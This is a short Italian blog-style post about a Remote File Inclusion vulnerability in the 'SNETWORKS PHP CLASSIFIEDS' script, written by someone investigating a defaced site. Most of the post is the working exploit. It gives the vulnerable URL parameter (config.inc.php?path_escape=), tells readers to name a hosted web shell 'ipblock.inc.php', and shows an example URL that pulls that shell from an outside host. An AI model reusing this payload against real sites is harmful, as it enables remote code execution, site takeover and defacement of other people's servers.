Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.
Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:
http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?
Dalle mie verifiche ho riscontrato che il file che viene ricercato nell’Url specificato è “ipblock.inc.php” e, quindi, se volete includere una shell o simili vi consiglio di chiamare il file in tale modo e inserire l’Url dell Rfi senza specificare il file.
Se, quindi, avete il file nel sito “http://www.miosito.it/shell/ipblock.inc.php” l’Url per la Remote File Inclusion sarà:
http://[Taget]/[Path]/config.inc.php?path_escape=http://www.miosito.it/shell/
A questo link potete leggere la Vulnerabilità descritta dal sito FrSIRT.
